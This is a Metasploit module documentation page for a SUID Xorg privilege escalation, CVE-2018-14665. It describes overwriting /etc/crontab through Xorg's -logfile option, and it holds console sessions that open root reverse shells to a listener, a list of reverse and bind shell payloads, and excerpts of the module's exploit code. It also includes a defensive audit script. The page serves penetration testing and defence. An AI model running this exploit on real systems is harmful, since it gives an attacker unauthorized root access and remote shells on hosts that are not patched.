Xorg X11 Server SUID logfile Privilege Escalation - Metasploit
This page contains detailed information about how to use the exploit/multi/local/xorg_x11_suid_server metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Xorg X11 Server SUID logfile Privilege Escalation
Module: exploit/multi/local/xorg_x11_suid_server
Source code: modules/exploits/multi/local/xorg_x11_suid_server.rb
Disclosure date: 2018-10-25
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): cmd, x86, x64
Supported platform(s): Linux, OpenBSD
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2018-14665
This module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 < 1.20.3. A permission check flaw exists for the -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server to elevate privileges and run arbitrary code as root. This module has been tested with OpenBSD 6.3, 6.4, CentOS 7.4.1708, CentOS 7.5.1804, and RHEL 7.5. The default PAM configuration for CentOS and RHEL systems requires console auth for the user's session to start the Xorg server. Cron launches the payload, so if SELinux is enforcing, exploitation may still be possible, but the module will bail. Xorg must have SUID permissions and may not start if it is already running. On exploitation a crontab.old backup file will be created by Xorg. This module will remove the .old file and restore crontab after successful exploitation. Failed exploitation may result in a corrupted crontab. On successful exploitation, artifacts will be created consistent with starting Xorg and running a cron job.
Module Ranking and Traits
Module Ranking:
- good: The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). More information about ranking can be found here.
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.
msf > use exploit/multi/local/xorg_x11_suid_server
msf exploit(xorg_x11_suid_server) > show targets
... a list of targets ...
msf exploit(xorg_x11_suid_server) > set TARGET target-id
msf exploit(xorg_x11_suid_server) > show options
... show and set options ...
msf exploit(xorg_x11_suid_server) > set SESSION session-id
msf exploit(xorg_x11_suid_server) > exploit
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Description
This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID. A permission check flaw exists for the -modulepath and -logfile options when starting Xorg. This flaw allows users to overwrite existing files on the system. This exploit backs up crontab and then uses -logfile to overwrite it. The command to be run is passed as the Font Path argument -fp, so it is written into the log (now /etc/crontab) and run by cron.
Vulnerable Application
Xorg (commonly referred to simply as X) is the most popular display server among Linux users. Its ubiquity has made it an ever-present requisite for GUI applications, resulting in massive adoption by most distributions.
Xorg is more restrictive to exploit under CentOS / RHEL. The user must hold a console lock, and SELinux may interfere. If SELinux is enforcing, the crontab's security context will be changed on exploit and you will be unable to clean it up.
This module has been tested successfully on:
- OpenBSD 6.3
- OpenBSD 6.4
- CentOS 7.4.1708 x86_64
- CentOS 7.5.1084 x86_64
- Red Hat Enterprise Linux 7.5 x86_64
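The following is an added example, not part of the Metasploit module or the Xorg project: a small POSIX shell checker a defender can run to confirm the two preconditions the Description names (a SUID Xorg binary in the 1.19.0 to 1.20.2 range) and to spot the artifacts this technique leaves (an /etc/crontab containing X server log text or a dropped .session-* path, plus the crontab.old backup Xorg creates). It assumes that `Xorg -version` prints "X.Org X Server x.y.z", that GNU grep -o is available, and that a crontab overwritten via -logfile carries the log banner or timestamped "[ n.nnn]" lines.

```shell
#!/bin/sh
# Added example (not the Metasploit module's or Xorg's own code): exposure and
# artifact checks for CVE-2018-14665 on a single host.

# Extract the first x.y.z version from `Xorg -version` output read on stdin.
# Assumes the banner line "X.Org X Server x.y.z" comes before any kernel
# version strings in the output (it is the first line in practice).
parse_xorg_version() {
  grep -oE '[0-9]+\.[0-9]+\.[0-9]+' | head -n 1
}

# Return 0 when x.y.z is inside the range the module treats as vulnerable:
# 1.19.0 <= version <= 1.20.2 (1.20.3 carries the fix).
xorg_version_affected() {
  v="$1"
  major=${v%%.*}
  rest=${v#*.}
  minor=${rest%%.*}
  patch=${rest#*.}
  [ "$major" -eq 1 ] 2>/dev/null || return 1
  if [ "$minor" -eq 19 ]; then
    return 0
  elif [ "$minor" -eq 20 ] && [ "$patch" -le 2 ]; then
    return 0
  fi
  return 1
}

# Return 0 when the binary at $1 carries the setuid bit, the precondition the
# module checks before anything else.
xorg_is_suid() {
  [ -u "$1" ]
}

# Return 0 when the crontab at $1 looks like an X server log rather than a
# crontab: the "X.Org X Server" banner, timestamped "[ n.nnn]" log lines, or a
# ".session-" script path (the module's default naming in WritableDir).
# The log-line pattern is an assumption about the Xorg log format.
crontab_looks_overwritten() {
  f="$1"
  [ -r "$f" ] || return 1
  grep -qE '^X\.Org X Server|^\[ *[0-9]+\.[0-9]+\]|/\.session-' "$f"
}

# Return 0 when the ".old" backup Xorg leaves beside a rotated logfile exists
# next to the crontab at $1.
crontab_backup_present() {
  [ -e "$1.old" ]
}

# Run every check; prints findings and returns their count as the exit status
# (0 means nothing found). $1 overrides the Xorg path, $2 the crontab path.
audit_host() {
  xorg_bin=${1:-$(command -v Xorg 2>/dev/null)}
  crontab=${2:-/etc/crontab}
  findings=0
  if [ -n "$xorg_bin" ] && xorg_is_suid "$xorg_bin"; then
    ver=$("$xorg_bin" -version 2>&1 | parse_xorg_version)
    if [ -n "$ver" ] && xorg_version_affected "$ver"; then
      echo "FINDING: $xorg_bin is setuid and version $ver is in the CVE-2018-14665 range"
      findings=$((findings + 1))
    fi
  fi
  if crontab_looks_overwritten "$crontab"; then
    echo "FINDING: $crontab contains X server log content or a dropped .session script"
    findings=$((findings + 1))
  fi
  if crontab_backup_present "$crontab"; then
    echo "FINDING: $crontab.old present (Xorg log rotation backup)"
    findings=$((findings + 1))
  fi
  return "$findings"
}
```

Run `audit_host` with no arguments on the host to check its own Xorg binary and /etc/crontab; the exit status is the number of findings.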
Verification Steps
On CentOS/RHEL your session must have a console lock. To get a console lock you can log in locally as a user.
- Start msfconsole
- Get a session
- Do: use exploit/multi/local/xorg_x11_suid_server
- Do: Set a payload/target or use the default (cmd/unix/reverse_openssl)
- Do: set SESSION [SESSION]
- Do: set LHOST [LHOST]
- Do: run
- You should get a new root session
Advanced Options
Xdisplay
Display to use for Xorg (default: :1)
WritableDir
A writable directory file system path (default: /tmp)
ConsoleLock
Will check for console lock under linux (default: true)
Scenarios
OpenBSD
msf5 > use exploit/multi/local/xorg_x11_suid_server
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.30.0.2
lhost => 172.30.0.2
msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
verbose => true
msf5 exploit(multi/local/xorg_x11_suid_server) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse double SSL handler on 172.30.0.2:4444
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo t2XWfcWkZHevLPS8;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "t2XWfcWkZHevLPS8\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (172.30.0.2:4444 -> 172.30.0.99:41253) at 2018-11-12 15:06:39 -0600
[+] Returning session after cleaning
[+] Deleted /tmp/.session-odRjfx
id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
CentOS 7.4.1708 x86_64
msf5 > use exploit/multi/local/xorg_x11_suid_server
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
verbose => true
msf5 exploit(multi/local/xorg_x11_suid_server) > run
[*] Started reverse double SSL handler on 172.16.191.188:4444
[*] Running additional check for Linux
[+] Console lock for user
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.3 is vulnerable
[!] Xorg in process list
[!] Could not get version or Xorg process possibly running, may fail
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zk0jobDMxFdBxLBU;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "zk0jobDMxFdBxLBU\n"
[*] Matching...
[*] B is input...
[*] Command shell session 7 opened (172.16.191.188:4444 -> 172.16.191.141:46318) at 2018-11-24 21:31:04 -0500
[*] Waiting on cron to run
[+] Returning session after cleaning
[+] Deleted /tmp/.session-Tafw0iW0r8
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux centos-7-1708.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
Red Hat Enterprise Linux 7.5 x86_64
msf5 > use exploit/multi/local/xorg_x11_suid_server
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
verbose => true
msf5 exploit(multi/local/xorg_x11_suid_server) > run
[*] Started reverse double SSL handler on 172.16.191.165:4444
[*] Running additional check for Linux
[+] Console lock for user
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.5 is vulnerable
[!] Xorg in process list
[!] Could not get version or Xorg process possibly running, may fail
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo EEdPp66R4es6U3WF;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[+] /etc/crontab overwrite successful. Waiting for job to run (may take a minute)...
[*] Reading from socket B
[*] B: "EEdPp66R4es6U3WF\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.228:44978) at 2019-04-21 06:29:04 -0400
[+] Returning session after cleaning
[+] Deleted /tmp/.session-aqxyug0fH
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux red-hat-7-5-x64.local 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux
cat /etc/redhat-release
Red Hat Enterprise Linux Server release 7.5 (Maipo)
Msfconsole Usage
Here is how the multi/local/xorg_x11_suid_server exploit module looks in the msfconsole:
msf6 > use exploit/multi/local/xorg_x11_suid_server
[*] Using configured payload cmd/unix/reverse_openssl
msf6 exploit(multi/local/xorg_x11_suid_server) > show info
Name: Xorg X11 Server SUID logfile Privilege Escalation
Module: exploit/multi/local/xorg_x11_suid_server
Platform: OpenBSD, Linux
Arch: cmd, x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Good
Disclosed: 2018-10-25
Provided by:
Narendra Shinde
Raptor - 0xdea
Aaron Ringo
bcoles <[email protected]>
Available targets:
Id Name
-- ----
0 OpenBSD
1 Linux x64
2 Linux x86
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload information:
Description:
This module attempts to gain root privileges with SUID Xorg X11
server versions 1.19.0 < 1.20.3. A permission check flaw exists for
-modulepath and -logfile options when starting Xorg. This allows
unprivileged users that can start the server the ability to elevate
privileges and run arbitrary code under root privileges. This module
has been tested with OpenBSD 6.3, 6.4, CentOS 7.4.1708, and CentOS
7.5.1804, and RHEL 7.5. The default PAM configuration for CentOS and
RHEL systems requires console auth for the user's session to start
the Xorg server. Cron launches the payload, so if SELinux is
enforcing, exploitation may still be possible, but the module will
bail. Xorg must have SUID permissions and may not start if already
running. On exploitation a crontab.old backup file will be created
by Xorg. This module will remove the .old file and restore crontab
after successful exploitation. Failed exploitation may result in a
corrupted crontab. On successful exploitation artifacts will be
created consistant with starting Xorg and running a cron.
References:
https://nvd.nist.gov/vuln/detail/CVE-2018-14665
http://www.securityfocus.com/bid/105741
https://www.exploit-db.com/exploits/45697
https://www.exploit-db.com/exploits/45742
https://www.exploit-db.com/exploits/45832
https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm
Module Options
This is a complete list of options available in the multi/local/xorg_x11_suid_server exploit:
msf6 exploit(multi/local/xorg_x11_suid_server) > show options
Module options (exploit/multi/local/xorg_x11_suid_server):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (cmd/unix/reverse_openssl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 OpenBSD
Advanced Options
Here is a complete list of advanced options supported by the multi/local/xorg_x11_suid_server exploit:
msf6 exploit(multi/local/xorg_x11_suid_server) > show advanced
Module advanced options (exploit/multi/local/xorg_x11_suid_server):
Name Current Setting Required Description
---- --------------- -------- -----------
ConsoleLock true yes Will check for console lock on linux systems
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 120 no Additional delay in seconds to wait for a session
WritableDir /tmp yes A directory where we can write files
Xdisplay :1 yes Display exploit will attempt to use
Payload advanced options (cmd/unix/reverse_openssl):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
HandlerSSLCert no Path to a SSL certificate in unified PEM format
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/local/xorg_x11_suid_server module can exploit:
msf6 exploit(multi/local/xorg_x11_suid_server) > show targets
Exploit targets:
Id Name
-- ----
0 OpenBSD
1 Linux x64
2 Linux x86
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/local/xorg_x11_suid_server exploit:
msf6 exploit(multi/local/xorg_x11_suid_server) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
1 payload/cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
2 payload/cmd/unix/bind_jjs normal No Unix Command Shell, Bind TCP (via jjs)
3 payload/cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
4 payload/cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
5 payload/cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
6 payload/cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
7 payload/cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs)
8 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
9 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
10 payload/cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
11 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
12 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
13 payload/cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
14 payload/cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub)
15 payload/cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
16 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
17 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
18 payload/cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
19 payload/cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp)
20 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
21 payload/cmd/unix/reverse_bash_udp normal No Unix Command Shell, Reverse UDP (/dev/udp)
22 payload/cmd/unix/reverse_jjs normal No Unix Command Shell, Reverse TCP (via jjs)
23 payload/cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
24 payload/cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
25 payload/cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
26 payload/cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
27 payload/cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
28 payload/cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs)
29 payload/cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
30 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
31 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
32 payload/cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
33 payload/cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
34 payload/cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
35 payload/cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
36 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
37 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
38 payload/cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
39 payload/cmd/unix/reverse_ssh normal No Unix Command Shell, Reverse TCP SSH
40 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
41 payload/cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub)
42 payload/cmd/unix/reverse_tclsh normal No Unix Command Shell, Reverse TCP (via Tclsh)
43 payload/cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
44 payload/generic/custom normal No Custom Payload
45 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
46 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the multi/local/xorg_x11_suid_server exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/local/xorg_x11_suid_server) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
- No console lock for <USER>
- Selinux is enforcing
- Could not find Xorg executable
- Xorg binary <XORG_PATH> is not SUID
- Xorg version <V> not supported
- Fatal server error
- User probably does not have console auth
- Below is Xorg -version output
- Could not parse Xorg -version output
- Xorg in process list
- Could not get version or Xorg process possibly running, may fail
- Target not vulnerable
- This session already has root privileges
- <WRITABLEDIR> is not writable
- Deleting crontab backup
- /etc/crontab not modified
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
No console lock for <USER>
Here is a relevant code snippet related to the "No console lock for <USER>" error message:
    if uname =~ /linux/i
      vprint_status "Running additional check for Linux"
      if datastore['ConsoleLock']
        user = cmd_exec "id -un"
        unless exist? "/var/run/console/#{user}"
          vprint_error "No console lock for #{user}"
          return CheckCode::Safe
        end
        vprint_good "Console lock for #{user}"
      end
      if selinux_installed?
Selinux is enforcing
Here is a relevant code snippet related to the "Selinux is enforcing" error message:
        end
        vprint_good "Console lock for #{user}"
      end
      if selinux_installed?
        if selinux_enforcing?
          vprint_error 'Selinux is enforcing'
          return CheckCode::Safe
        end
      end
      vprint_good "Selinux is not an issue"
    end
Could not find Xorg executable
Here is a relevant code snippet related to the "Could not find Xorg executable" error message:
    end

    # suid program check
    xorg_path = cmd_exec "command -v Xorg"
    unless xorg_path.include?("Xorg")
      vprint_error "Could not find Xorg executable"
      return CheckCode::Safe
    end
    vprint_good "Xorg path found at #{xorg_path}"
    unless setuid? xorg_path
      vprint_error "Xorg binary #{xorg_path} is not SUID"
Xorg binary <XORG_PATH> is not SUID
Here is a relevant code snippet related to the "Xorg binary <XORG_PATH> is not SUID" error message:
      vprint_error "Could not find Xorg executable"
      return CheckCode::Safe
    end
    vprint_good "Xorg path found at #{xorg_path}"
    unless setuid? xorg_path
      vprint_error "Xorg binary #{xorg_path} is not SUID"
      return CheckCode::Safe
    end
    vprint_good "Xorg binary #{xorg_path} is SUID"

    # version check
Xorg version <V> not supported
Here is a relevant code snippet related to the "Xorg version <V> not supported" error message:
    # version check
    x_version = cmd_exec "Xorg -version"
    if x_version.include?("Release Date")
      v = Rex::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
      unless v.between?(Rex::Version.new('1.19.0'), Rex::Version.new('1.20.2'))
        vprint_error "Xorg version #{v} not supported"
        return CheckCode::Safe
      end
    elsif x_version.include?("Fatal server error")
      vprint_error "User probably does not have console auth"
      vprint_error "Below is Xorg -version output"
Fatal server error
Here is a relevant code snippet related to the "Fatal server error" error message:
      v = Rex::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
      unless v.between?(Rex::Version.new('1.19.0'), Rex::Version.new('1.20.2'))
        vprint_error "Xorg version #{v} not supported"
        return CheckCode::Safe
      end
    elsif x_version.include?("Fatal server error")
      vprint_error "User probably does not have console auth"
      vprint_error "Below is Xorg -version output"
      vprint_error x_version
      return CheckCode::Safe
    else
User probably does not have console auth
Here is a relevant code snippet related to the "User probably does not have console auth" error message:
      unless v.between?(Rex::Version.new('1.19.0'), Rex::Version.new('1.20.2'))
        vprint_error "Xorg version #{v} not supported"
        return CheckCode::Safe
      end
    elsif x_version.include?("Fatal server error")
      vprint_error "User probably does not have console auth"
      vprint_error "Below is Xorg -version output"
      vprint_error x_version
      return CheckCode::Safe
    else
      vprint_warning "Could not parse Xorg -version output"
Below is Xorg -version output
Here is a relevant code snippet related to the "Below is Xorg -version output" error message:
        vprint_error "Xorg version #{v} not supported"
        return CheckCode::Safe
      end
    elsif x_version.include?("Fatal server error")
      vprint_error "User probably does not have console auth"
      vprint_error "Below is Xorg -version output"
      vprint_error x_version
      return CheckCode::Safe
    else
      vprint_warning "Could not parse Xorg -version output"
      return CheckCode::Appears
Could not parse Xorg -version output
Here is a relevant code snippet related to the "Could not parse Xorg -version output" error message:
      vprint_error "User probably does not have console auth"
      vprint_error "Below is Xorg -version output"
      vprint_error x_version
      return CheckCode::Safe
    else
      vprint_warning "Could not parse Xorg -version output"
      return CheckCode::Appears
    end
    vprint_good "Xorg version #{v} is vulnerable"

    # process check for /X
Xorg in process list
Here is a relevant code snippet related to the "Xorg in process list" error message:
    vprint_good "Xorg version #{v} is vulnerable"

    # process check for /X
    proc_list = cmd_exec "ps ax"
    if proc_list.include?('/X ')
      vprint_warning('Xorg in process list')
      return CheckCode::Appears
    end
    vprint_good('Xorg does not appear running')
    return CheckCode::Vulnerable
  end
Could not get version or Xorg process possibly running, may fail
Here is a relevant code snippet related to the "Could not get version or Xorg process possibly running, may fail" error message:
  end

  def exploit
    check_status = check
    if check_status == CheckCode::Appears
      print_warning 'Could not get version or Xorg process possibly running, may fail'
    elsif check_status == CheckCode::Safe
      fail_with Failure::NotVulnerable, 'Target not vulnerable'
    end

    if is_root?
Target not vulnerable
Here is a relevant code snippet related to the "Target not vulnerable" error message:
  def exploit
    check_status = check
    if check_status == CheckCode::Appears
      print_warning 'Could not get version or Xorg process possibly running, may fail'
    elsif check_status == CheckCode::Safe
      fail_with Failure::NotVulnerable, 'Target not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'This session already has root privileges'
    end
This session already has root privileges
Here is a relevant code snippet related to the "This session already has root privileges" error message:
    elsif check_status == CheckCode::Safe
      fail_with Failure::NotVulnerable, 'Target not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'This session already has root privileges'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end
<WRITABLEDIR> is not writable
Here is a relevant code snippet related to the "<WRITABLEDIR> is not writable" error message:
    if is_root?
      fail_with Failure::BadConfig, 'This session already has root privileges'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

    print_good 'Passed all initial checks for exploit'

    pscript = "#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}"
Deleting crontab backup
Here is a relevant code snippet related to the "Deleting crontab backup" error message:
      cmd_exec "pkill Xorg"
      Rex.sleep 1
      cron_check = cmd_exec "grep -F #{pscript} /etc/crontab"
      unless cron_check.include? pscript
        rm_f "#{pscript}.b"
        print_error 'Deleting crontab backup'
        fail_with Failure::NotVulnerable, '/etc/crontab not modified'
      end
      print_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...'
    end
  end
/etc/crontab not modified
Here is a relevant code snippet related to the "/etc/crontab not modified" error message:
      cmd_exec "pkill Xorg"
      Rex.sleep 1
      cron_check = cmd_exec "grep -F #{pscript} /etc/crontab"
      unless cron_check.include? pscript
        rm_f "#{pscript}.b"
        print_error 'Deleting crontab backup'
        fail_with Failure::NotVulnerable, '/etc/crontab not modified'
      end
      print_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...'
    end
  end
Related Pull Requests
- #14769 Merged Pull Request: Handle nil versions in preparation for rubygems 4
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #11764 Merged Pull Request: Update tested versions for xorg_x11_suid_server module
- #11234 Merged Pull Request: revisionism
- #11015 Merged Pull Request: Improve Xorg_privesc module consolelock check, payload upload & formatting
- #10916 Merged Pull Request: Add module Xorg SUID privesc
References
- CVE-2018-14665
- BID-105741
- EDB-45697
- EDB-45742
- EDB-45832
- https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
- https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm
See Also
Check also the following modules related to this module:
- exploit/aix/local/xorg_x11_server
- exploit/multi/local/xorg_x11_suid_server_modulepath
- exploit/multi/local/allwinner_backdoor
- exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
- exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout
- exploit/linux/http/rancher_server
- exploit/linux/misc/qnap_transcode_server
- exploit/multi/misc/java_jmx_server
- exploit/multi/misc/java_rmi_server
- exploit/windows/browser/yahoomessenger_server
- exploit/windows/ftp/xlink_server
- exploit/windows/misc/bigant_server
- exploit/windows/misc/hta_server
- exploit/windows/misc/mirc_privmsg_server
- exploit/windows/scada/codesys_web_server
- exploit/windows/scada/procyon_core_server
- auxiliary/scanner/x11/open_x11
- exploit/unix/x11/x11_keyboard_exec
- exploit/multi/gdb/gdb_server_exec
- exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec
- exploit/multi/http/makoserver_cmd_exec
- exploit/multi/http/rocket_servergraph_file_requestor_rce
- exploit/multi/misc/bmc_server_automation_rscd_nsh_rce
- exploit/multi/misc/indesign_server_soap
- exploit/multi/realserver/describe
- exploit/linux/local/asan_suid_executable_priv_esc
- exploit/linux/local/ktsuss_suid_priv_esc
- exploit/linux/local/omniresolve_suid_priv_esc
- exploit/linux/local/zyxel_suid_cp_lpe
Related Nessus plugins:
- SUSE SLES11 Security Update : xorg-x11-server (SUSE-SU-2018:3456-1)
- Debian DSA-4328-1 : xorg-server - security update
- Ubuntu 16.04 LTS / 18.04 LTS / 18.10 : X.Org X server vulnerability (USN-3802-1)
- GLSA-201810-09 : X.Org X Server: Privilege escalation
- RHEL 7 : xorg-x11-server (RHSA-2018:3410)
- Oracle Linux 7 : xorg-x11-server (ELSA-2018-3410)
- CentOS 7 : xorg-x11-server (CESA-2018:3410)
- openSUSE Security Update : xorg-x11-server (openSUSE-2018-1420)
- Scientific Linux Security Update : xorg-x11-server on SL7.x x86_64 (20181031)
